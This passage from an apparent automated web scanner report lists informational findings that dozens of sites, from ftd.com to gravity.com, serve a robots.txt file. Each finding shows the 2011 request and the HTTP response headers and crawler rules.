P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 677
Date: Sat, 02 Apr 2011 13:39:27 GMT
Connection: close
Last-Modified: Tue, 15 Jun 2010 15:17:11 GMT
Server: Apache/1.3.37
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=1, max=120

User-agent: Googlebot-Mobile
Disallow: /search/
Disallow: /ftArticle
Disallow: /FTePaper
Disallow: /epaper
Disallow: /cms/s/8bb7fbd4-e176-11dd-afa0-0000779fd2ac.html
Disallow: /Common/

User-agent: Go
...[SNIP]...
24.340. http://www.ftd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=8B7AED345D2F105D0020F14BA4D1F7AE; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=8B7AED345D2F105D0020F14BA4D1F7AE; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:46:00 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
Last-Modified: Wed, 19 Jan 2011 03:55:49 GMT
ETag: "ba-4d3660c5"
Content-Length: 186
Content-Type: text/plain
Content-Length: 186
Date: Sat, 02 Apr 2011 13:46:00 GMT
X-Varnish: 1768820919
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /1
Disallow: /2
Disallow: /3
Disallow: /4
Disallow: /5
Disallow: /6
Disallow: /7
Disallow: /8
Disallow: /9

Allow: /350/

Sitemap: http://www.ftd.com/sitemap.xml
24.341. http://www.funadvice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funadvice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funadvice.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sat, 02 Apr 2011 14:02:57 GMT
Content-Type: text/plain
Content-Length: 2348
Last-Modified: Thu, 03 Mar 2011 17:25:41 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

#### Last updated: June 28th, 2010
#### Unauthorized crawling strictly prohibited. We have had bot detection
#### systems running for some time now. We can & will hand you your ass
#### if you crawl o
...[SNIP]...
24.342. http://www.funbrain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funbrain.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:16 GMT
ETag: "6a-477a2fd7bd100"
Expires: Sat, 02 Apr 2011 13:27:16 GMT
Last-Modified: Thu, 05 Nov 2009 17:23:48 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750836385285; path=/; expires=Sun, 01-Apr-12 13:27:16 GMT; domain=.funbrain.com
Vary: Accept-Encoding
Content-Length: 106
Connection: Close

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /cgi-bin
Disallow: /funbrain/cgi-bin

24.343. http://www.funny-games.biz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funny-games.biz
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funny-games.biz

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:58:38 GMT
Content-Type: text/plain
Content-Length: 120
Last-Modified: Tue, 09 Feb 2010 22:47:40 GMT
Connection: close
Expires: Tue, 03 May 2011 13:58:38 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

User-agent: *
Disallow: /public/
Disallow: /user_file/
Disallow: /betatest/

User-agent: Mediapartners-Google*
Disallow:
24.344. http://www.funnyordie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funnyordie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funnyordie.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain; charset=utf-8
Status: 200 OK
ETag: "4b4e1bfbc218c20ca8dbb1f93b1f1fe1"
X-Runtime: 5
X-Varnish: 2106476738 2106240822
Content-Length: 477
X-Varnish: 2005621957 2003991129
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Sat, 02 Apr 2011 13:34:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:34:15 GMT
Connection: close

Sitemap: http://www.funnyordie.com/sitemap.xml
User-agent: *
Disallow: /account
Disallow: /account/
Disallow: /signup
Disallow: /login
Disallow: /logout
Disallow: /player/
Disallow: /sessions
Disallow
...[SNIP]...
24.345. http://www.g4tv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.g4tv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.g4tv.com

Response

HTTP/1.0 200 OK
Content-Length: 65
Content-Type: text/plain
Content-Location: http://origin.g4tv.com/robots.txt
Last-Modified: Thu, 25 Feb 2010 20:03:07 GMT
Accept-Ranges: bytes
ETag: "804ff48b55b6ca1:d41"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 02 Apr 2011 13:40:33 GMT
Connection: close

User-Agent: *
Allow: /

Sitemap: http://g4tv.com/sitemap.xml
24.346. http://www.gaiaonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gaiaonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gaiaonline.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 21:06:58 GMT
ETag: "57e34114-59d-52f98080"
Accept-Ranges: bytes
Content-Length: 1437
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /account
Disallow: /achievements
Disallow: /arena/arts/comics/deletepost
Disallow: /arena/carousel
Disallow: /arena/searches
Disallow: /arena/settabcookie
Disallow: /auth
Disal
...[SNIP]...
24.347. http://www.gamefaqs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamefaqs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamefaqs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:36 GMT
Server: Apache
Last-Modified: Wed, 08 Sep 2010 23:08:47 GMT
ETag: "88329-50-48fc798859dc0"
Accept-Ranges: bytes
Content-Length: 80
Keep-Alive: timeout=15, max=949
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

# robots.txt for http://www.gamefaqs.com/

User-agent: *
Disallow: /search/
24.348. http://www.gamerdna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamerdna.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamerdna.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5
Last-Modified: Sat, 22 Nov 2008 02:54:30 GMT
ETag: "4dc8-282-45c3e47d96580"
Accept-Ranges: bytes
Content-Length: 642
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /announcement.php
Disallow: /calendar.php
Disallow: /cron.php
Disallow: /editpost.php
Disallow: /joinrequests.php
Disallow: /login.php
Disallow: /member.php
Disallow: /misc.php
...[SNIP]...
24.349. http://www.games.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.games.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 128
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

User-Agent: *
Allow: /
Disallow: /_uac/
Disallow: /includes/
Disallow: /modules/
Disallow: /WEB-INF/
Sitemap: /sitemap_index.xml
24.350. http://www.gamesgames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesgames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamesgames.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:53:03 GMT
Connection: close
Content-Length: 25

User-agent: *
Allow: /
24.351. http://www.gamespot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamespot.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:01 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 22:21:35 GMT
ETag: "41125-49-493786a4359c0"
Accept-Ranges: bytes
Content-Length: 73
Keep-Alive: timeout=300, max=885
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Slurp
Disallow: /pages/tags/
Disallow: /tags/
Crawl-delay: 2
24.352. http://www.gamesradar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamesradar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Last-Modified: Tue, 04 May 2010 19:20:08 GMT
ETag: "2bc0005-e5-485c998f5aa00"
Accept-Ranges: bytes
Content-Length: 229
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /profile-edit/
Disallow: /administration/
Disallow: /radarnation/update-account
Disallow: /vid-config
Disallow: /vid-playlist

# Sitemap files
Sitemap: http://www.games
...[SNIP]...
24.353. http://www.gamestop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamestop.com

Response

HTTP/1.0 200 OK
Content-Length: 117
Content-Type: text/plain
Content-Location: http://www.gamestop.com/robots.txt
Last-Modified: Wed, 27 Oct 2010 13:41:23 GMT
Accept-Ranges: bytes
ETag: "73f6e8a4dc75cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:19 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /Profiles
Disallow: /Orders
Sitemap: http://www.gamestop.com/sitemap-index.xml
24.354. http://www.gametrailers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gametrailers.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:37:31 GMT
Content-Length: 137
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:37:31 GMT; path=/
Vary: User-Agent

User-agent: *
Sitemap: http://www.gametrailers.com/sitemap.xml

User-Agent: msnbot-media
Disallow:

User-Agent: msnbot
Disallow:
24.355. http://www.gamevance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamevance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamevance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:26 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:32:56 GMT
ETag: "3802de-19-48c09e1b25e00"
Accept-Ranges: bytes
Content-Length: 25
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:53:26 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
24.356. http://www.gamewinners.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamewinners.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamewinners.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:37:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 May 2010 21:14:15 GMT
ETag: "4be8088-4ca-133b37c0"
Accept-Ranges: bytes
Content-Length: 1226
Content-Type: text/plain; charset=UTF-8
Age: 499
X-Cache: HIT from www.gamewinners.com
X-Cache-Lookup: HIT from www.gamewinners.com:80
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
Connection: close

# robots.txt for www.gamewinners.com
# Administrative contact available at http://www.gamewinners.com/email.htm
User-agent: Mediapartners-Google*
Disallow: /print.php
Disallow: /from.php
Disallow:
...[SNIP]...
24.357. http://www.gap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gap.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "e5edaf21c7f99e700dbda2a7d5edeacd:1275492491"
Last-Modified: Wed, 02 Jun 2010 15:27:13 GMT
Accept-Ranges: bytes
Content-Length: 5548
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close

# Updated 2010-06-02


# For all bots
User-agent: *
Allow: /profile/account_summary.do
Disallow: /browse/search.do
Disallow: /buy/
Disallow: /cookieFailure.do
Disallow: /image/
Disallow: /p
...[SNIP]...
24.358. http://www.gateway.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gateway.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gateway.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:06 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.8j
Vary: *
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:41:06 GMT
Last-Modified: Wed, 30 Apr 2008 16:54:46 GMT
ETag: "c4-4818a456"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /dw/
Disallow: /popup
Disallow: /work
Disallow: /government
Disallow: /education
Disallow: /gsa
Disallow: /corporation
Disallow: /smallbusiness
24.359. http://www.gather.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=EB36F55F45F2F7E6EBB8DA4180AA02C4; Domain=.gather.com; Path=/
Set-Cookie: vis=dxZcxPp5M50JLNy2639QG+AFqnYHparuLmhmYPtVGPPAs2jVOwihu4RJrClz12ATFATbqqOtA/iDUwytrzfx6RFSOnB/nbulf4sjRtkwWmY=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:33:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=Px4x67b/+RcuOBs80O9yZZAxITQ4ew8vww1nJwpoI+iaqKtMLWlgM+VhhbgWrVzOKz0WuOXt5Kk8UmHpLI4bO/TFGZjT+D0HUnvNbiUtBb0r8B+Jqfu/jx7vXE7s/eDN; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:33:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 4696
Keep-Alive: timeout=5, max=100
Connection: close
Content-Type: text/plain;charset=UTF-8

# robots.txt for gather.com


User-agent: Twiceler
Crawl-delay: 0.5

User-agent: Slurp
Crawl-delay: 3

User-agent: Speedy
Crawl-delay: 5

User-agent: *
Disallow: /viewMemberFeed.action
Di
...[SNIP]...
24.360. http://www.geico.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.geico.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.geico.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain; charset=ISO-8859-1
Expires: Sat, 02 Apr 2011 13:35:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:16 GMT
Content-Length: 574
Connection: close
Set-Cookie: SaneID=30196B1937FB6D94; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.geico.com

User-agent: *
Sitemap: http://www.geico.com/sitemap
Disallow: /404/
Disallow: /akm/
Disallow: /applications/
Disallow: /email/
Disallow: /images/
Disallow: /includes/
Disallow: /landingpage/
Disallow:
...[SNIP]...
24.361. http://www.gemoney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemoney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gemoney.com

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 14:58:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 06 May 2010 15:30:13 GMT
ETag: "5947-2d6-9e656b40"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 726
Connection: close
Age: 82921

User-agent: *
Disallow: /en/business/Markets/general_GAT_landing_page.html
Disallow: /en/business/Markets/Automotive/automotive_GAT_landing_page.html
Disallow: /en/business/Markets/Furnishings/fu
...[SNIP]...
24.362. http://www.genealogy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.genealogy.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:40 GMT
Server: Apache
Set-Cookie: SessionID=990a52058afc1bff4d973004; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D000b5b058afd63ff4d973004; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb09:
Last-Modified: Fri, 12 Mar 2010 20:43:23 GMT
ETag: "28dfd3-c9-4b9aa76b"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=152676544.20480.0000; path=/

# robots.txt for http://www.genealogy.com/
#

User-agent: *
Disallow: /cgi-bin # keep robots out of the executable tree
Disallow: /users/f/r/e/Robert-L-Frey-jr

User-agent: WebReaper
Disallow: /
...[SNIP]...
24.363. http://www.gf2ube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gf2ube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gf2ube.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:44 GMT
Server: Apache
Last-Modified: Sun, 27 Dec 2009 19:40:45 GMT
ETag: "2c8a453-23-47bbaf700c940"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
24.364. http://www.gifts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gifts.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 18:42:52 GMT
ETag: "be4-22f-49c0610c62300"
Accept-Ranges: bytes
Content-Length: 559
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: SERVERID=web08; path=/
Cache-control: private

User-agent: *
Disallow: /search/offer_click/
Disallow: /search/core_offer_click/
Disallow: /search/api_offer_click/
Disallow: /search/sponsored_click/
Disallow: /search/wedding_channel_click/
Disallow
...[SNIP]...
24.365. http://www.godaddy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 02 Apr 2011 12:39:00 GMT
Connection: close
Content-Length: 718

#
# robots.txt
#
User-agent: Googlebot
Disallow: /about/godaddy-chinese.aspx
Disallow: /app
Disallow: /imag
Disallow: /out
Disallow: /gdshop/app
Disallow: /gdshop/clo
Disallow: /gdshop/con
Disallow: /
...[SNIP]...
24.366. http://www.gofreecredit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofreecredit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gofreecredit.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:24 GMT
Content-Type: text/plain
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=dkloptvcv2aemsa1ndk9igim35; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uid=ChViBk2XJhyPAz5VA1taAg==; expires=Sun, 01-Apr-12 13:35:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: uid=0CuC3E2XJhxzVSLlA2AiAg==; expires=Sun, 01-Apr-12 13:35:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

User-agent: *
Disallow:
24.367. http://www.goodreads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goodreads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goodreads.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sat, 02 Apr 2011 13:41:29 GMT
Content-Type: text/plain
Content-Length: 310
Last-Modified: Thu, 31 Mar 2011 23:27:02 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *

Disallow: /admin
Disallow: /home/index_rss
Disallow: /review/list_rss
Disallow: /user
...[SNIP]...
24.368. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sat, 02 Apr 2011 12:44:12 GMT
Expires: Sat, 02 Apr 2011 12:44:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
24.369. http://www.google.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.ca

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 02 Apr 2011 13:39:31 GMT
Expires: Sat, 02 Apr 2011 13:39:31 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.370. http://www.google.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.co.uk

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 02 Apr 2011 13:57:12 GMT
Expires: Sat, 02 Apr 2011 13:57:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.371. http://www.googleadservices.com/pagead/conversion/1012592563/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1012592563/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 02 Apr 2011 13:57:08 GMT
Expires: Sat, 02 Apr 2011 13:57:08 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.372. http://www.gossipcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gossipcenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gossipcenter.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Thu, 13 Jan 2011 22:00:03 GMT
Cache-Control: max-age=1209600
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1628
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:25:26 GMT
X-Varnish: 2537452138 2537125055
Age: 239
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 1

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.373. http://www.gourmandia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gourmandia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Mon, 03 Aug 2009 04:18:03 GMT
ETag: "668a51e-98f-e56f4c0"
Accept-Ranges: bytes
Content-Length: 2447
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gotopage.php?page=52
Disallow: /gotopage.php?page=51
Disallow: /gotopage.php?page=50
Disallow: /gotopage.php?page=26
Disallow: /gotopage.php?page=59
Disallow: /gotopage.php?pa
...[SNIP]...
24.374. http://www.gravity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gravity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gravity.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:12 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 23:32:00 GMT
